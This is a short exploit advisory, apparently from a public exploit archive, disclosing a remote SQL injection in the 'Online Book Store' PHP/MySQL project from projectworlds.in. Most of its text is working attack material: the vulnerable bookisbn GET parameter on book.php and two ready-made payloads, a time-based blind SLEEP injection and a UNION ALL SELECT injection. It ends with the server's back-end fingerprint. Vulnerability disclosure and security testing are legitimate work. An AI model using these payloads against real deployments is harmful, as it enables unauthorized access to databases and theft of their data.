Online Book Store from projectworlds.in suffers from a remote SQL injection vulnerability. Versions are not provided with this software currently.
39bdba6d1357688214210ee4f834b0964caa27b39ff1373d715f1d2eb3ddc240
====================================================================
Online Book Store project in PHP Mysql - SQL injection
====================================================================
####################################################################
.:. Author : Yussef Dajdaj
.:. Contact :
.:. Vendor : https://projectworlds.in/
.:. Script : https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
.:. Date: : 8/8/2020
.:. Tested on: : Tested on: Window 10 64 bit environment || XAMPP
####################################################################
===[ Exploit ]===
[*] SQL injection
=================================
https://localhost/testing/book.php?bookisbn='[injection<https://localhost/testing/book.php?bookisbn='%5binjection>]
Parameter: bookisbn (GET)
Type: time-based blind
Payload: bookisbn=978-1-1180-2669-4' AND (SELECT 6407 FROM (SELECT(SLEEP(5)))AXNT) AND 'uTiZ'='uTiZ
Type: UNION query
Payload: bookisbn=-5816' UNION ALL SELECT CONCAT(0x716a707a71,0x6442504257556d676a596278427966694f7854544a677357556e615041477066714f4e51754c704e,0x7178766b71),NULL,NULL,NULL,NULL,NULL,NULL-- rHNm
the back-end DBMS is MySQL, web application technology: PHP 7.2.32, PHP, Apache 2.4.43